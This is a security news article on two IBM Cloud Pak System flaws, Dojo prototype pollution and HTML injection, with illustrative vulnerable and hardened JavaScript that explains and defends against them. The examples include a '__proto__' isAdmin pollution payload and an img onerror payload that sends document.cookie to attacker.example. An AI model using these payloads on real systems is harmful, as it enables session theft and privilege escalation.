Thursday, April 16, 2026

IBM Cloud Pak System Vulnerabilities Let Attackers Inject Malicious HTML Code

IBM has disclosed two security vulnerabilities in its Cloud Pak System platform: one lets a remote attacker inject malicious HTML into pages the platform serves, and the other allows JavaScript object prototypes to be polluted through the Dojo framework's deepCopy method.

The vulnerabilities, tracked as CVE-2020-5258 and CVE-2025-2895, affect several versions of the enterprise cloud management platform on both Intel and Power architectures. The more severe of the two, CVE-2020-5258, carries a CVSS base score of 7.5 (High); CVE-2025-2895 is rated 5.4 (Medium).

IBM’s security bulletin, published on June 30, 2025, describes two distinct vulnerabilities in Cloud Pak System:

  • CVE-2020-5258 – Prototype Pollution: A prototype pollution flaw in the Dojo JavaScript framework’s deepCopy method. An attacker who controls the object being copied can inject properties into a shared prototype (the base object behind every plain JavaScript object), so the injected values appear on, or overwrite, properties of unrelated application objects.
  • CVE-2025-2895 – HTML Injection: A remote attacker can inject arbitrary HTML into content the platform renders. Its CVSS base score of 5.4 reflects that the attacker needs a low-privileged account and a victim must view the content.
  • Cross-Site Scripting Impact: When a victim views the content affected by the HTML injection, any script the attacker embedded runs in the victim’s browser in the security context of the hosting site, which is what makes the flaw a form of cross-site scripting.

IBM Cloud Pak System Vulnerabilities

IBM classifies the prototype pollution flaw in CVE-2020-5258 under CWE-94, improper control of generation of code (code injection); the more specific weakness for prototype pollution is CWE-1321, improperly controlled modification of object prototype attributes.

Its CVSS vector (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N) means the flaw is reachable over the network and requires neither privileges nor user interaction. The impact IBM scores is integrity only (C:N/I:H/A:N), and that combination is what produces the 7.5 base score.

By injecting properties into a shared prototype such as Object.prototype, an attacker can change how the application’s own objects behave, for example by making a configuration key or permission flag that was never set appear to hold an attacker-chosen value. The practical outcome depends on how the application consumes the polluted properties: data corruption and subverted application logic are the direct effects, and an authorization bypass or exposure of sensitive information is possible where a privilege check reads a property the attacker now controls.
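The following is an added example, not code from IBM or from the Dojo project: a naive recursive merge written in the style of the vulnerable deepCopy pattern, beside a hardened version. The function names, the ATTACKER_JSON payload and the isAdmin flag are constructed for illustration. It shows the mechanism described above: because the naive copy descends into target["__proto__"], which resolves through the inherited getter to Object.prototype, the attacker's keys land on the base object and surface on an unrelated object that was never touched.

```javascript
// Added example (not Dojo's code): naive deep merge vs. a hardened merge.

// VULNERABLE: enumerates every key, including "__proto__", and recurses into
// whatever target[name] resolves to. For "__proto__" that is the inherited
// getter, i.e. Object.prototype, so the source's nested keys pollute it.
function naiveDeepCopy(target, source) {
  for (const name in source) {
    const value = source[name];
    if (value !== null && typeof value === 'object' && !Array.isArray(value)) {
      if (target[name] === null || typeof target[name] !== 'object') {
        target[name] = {};
      }
      naiveDeepCopy(target[name], value);
    } else {
      target[name] = value;
    }
  }
  return target;
}

// HARDENED: own keys only, the prototype-reaching keys are refused, and the
// merge only descends into a child the target genuinely owns.
const BLOCKED_KEYS = new Set(['__proto__', 'constructor', 'prototype']);

function safeDeepCopy(target, source) {
  for (const name of Object.keys(source)) {
    if (BLOCKED_KEYS.has(name)) continue;
    const value = source[name];
    if (value !== null && typeof value === 'object' && !Array.isArray(value)) {
      const existing = Object.prototype.hasOwnProperty.call(target, name) ? target[name] : undefined;
      const child = (existing !== null && typeof existing === 'object' && !Array.isArray(existing))
        ? existing
        : {};
      target[name] = safeDeepCopy(child, value);
    } else {
      target[name] = value;
    }
  }
  return target;
}

// Constructed attacker-controlled JSON (hypothetical user-settings payload).
// JSON.parse creates "__proto__" as an ordinary own property, which is what
// lets it reach the for...in loop above.
const ATTACKER_JSON = '{"displayName":"alice","__proto__":{"isAdmin":true}}';

// Runs one merge and reports whether an unrelated object now sees isAdmin.
// Cleans up Object.prototype afterwards so the runtime is left as it was found.
function runScenario(copyFn) {
  const settings = {};
  try {
    copyFn(settings, JSON.parse(ATTACKER_JSON));
    const unrelated = {}; // never touched by the merge
    return { displayName: settings.displayName, polluted: unrelated.isAdmin === true };
  } finally {
    delete Object.prototype.isAdmin;
  }
}

console.log('naive:', runScenario(naiveDeepCopy));  // polluted: true
console.log('safe: ', runScenario(safeDeepCopy));   // polluted: false
```

The hardened merge combines the two checks that matter: it iterates own keys only (Object.keys rather than for...in) and refuses the three keys that can reach a prototype. Refusing "__proto__" alone is not enough in general, since "constructor.prototype" reaches the same object through a different path.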

The HTML injection vulnerability is a different class of flaw, categorized under CWE-80, improper neutralization of script-related HTML tags in a web page: attacker-supplied markup is returned to other users without being encoded.

Its CVSS vector (CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N) shows that the attacker needs a low-privileged account and the victim must take an action such as opening the affected page. Scope is changed (S:C) because the injected script runs in the victim’s browser rather than in the vulnerable component, and the low confidentiality and integrity impacts together with that scope change yield the 5.4 base score.
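As an added example, not code from IBM’s bulletin or the Cloud Pak System product, the block below shows the CWE-80 pattern in a constructed profile-rendering helper: one version concatenates an untrusted display name straight into markup, the other passes it through an HTML encoder for element content. The INJECTED_NAME payload, the attacker.example host and the function names are all hypothetical; the page does not identify where in Cloud Pak System the real injection point lies.

```javascript
// Added example (not Cloud Pak System code): HTML injection vs. output encoding.

const ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };

// Encodes a value for insertion as HTML element content.
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (c) => ESCAPES[c]);
}

// VULNERABLE: the untrusted value is interpolated into markup unchanged, so
// any tags it contains become part of the page the victim's browser parses.
function renderProfileVulnerable(user) {
  return `<div class="profile"><span class="name">${user.displayName}</span></div>`;
}

// HARDENED: every untrusted value is encoded for the context it is inserted
// into (element content here; attribute and URL contexts need their own encoders).
function renderProfileSafe(user) {
  return `<div class="profile"><span class="name">${escapeHtml(user.displayName)}</span></div>`;
}

// Constructed payload: what a low-privileged user might store as a display name
// so that it executes when a higher-privileged user views the profile.
const INJECTED_NAME =
  '<img src=x onerror="fetch(\'https://attacker.example/?c=\'+document.cookie)">';

// Crude review check: counts tag names in the rendered HTML that the template
// itself does not emit. Anything unexpected came from untrusted input.
function countUnexpectedTags(html, expectedTags) {
  const tags = html.match(/<\/?([a-zA-Z][a-zA-Z0-9]*)/g) || [];
  return tags
    .map((t) => t.replace(/^<\/?/, '').toLowerCase())
    .filter((t) => !expectedTags.has(t)).length;
}

const TEMPLATE_TAGS = new Set(['div', 'span']);
const user = { displayName: INJECTED_NAME };
console.log('vulnerable:', renderProfileVulnerable(user));
console.log('unexpected tags:', countUnexpectedTags(renderProfileVulnerable(user), TEMPLATE_TAGS)); // 1
console.log('safe:', renderProfileSafe(user));
console.log('unexpected tags:', countUnexpectedTags(renderProfileSafe(user), TEMPLATE_TAGS)); // 0
```

The encoder is deliberately context-specific: the same five characters are sufficient for element content and quoted attribute values, but a value placed inside a URL, a script block or an unquoted attribute needs different handling, which is why template engines that auto-escape per context are preferable to hand-rolled concatenation.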

Immediate Action

IBM has identified multiple versions of Cloud Pak System as vulnerable across different architectures.

For Intel-based systems, affected versions include 2.3.3.6, 2.3.4.0, and IBM Cloud Pak System Software Suite 2.3.4.1, along with their respective iFix releases.

Power architecture systems running versions 2.3.3.7 and 2.3.5.0 are also at risk.

IBM strongly recommends that organizations running Intel-based Cloud Pak System deployments immediately upgrade to version 2.3.6.0, which is available through IBM Fix Central and Passport Advantage Online.

For Power architecture users, IBM advises contacting IBM Support directly for remediation guidance. Organizations running unsupported versions should prioritize upgrading to currently supported product versions.

IBM has stated that no workarounds or mitigations are available for either vulnerability, so upgrading to a fixed version is the only effective remediation.

Enterprise security teams should treat these fixes as high priority: CVE-2020-5258 is exploitable remotely without authentication, and Cloud Pak System sits at the center of the cloud infrastructure it manages.


Ethan Brooks
Ethan Brooks is a Senior cybersecurity journalist passionate about threat intelligence and data privacy. His work highlights cyber attacks, hacking, security culture, and cybercrime with The Cyber News.
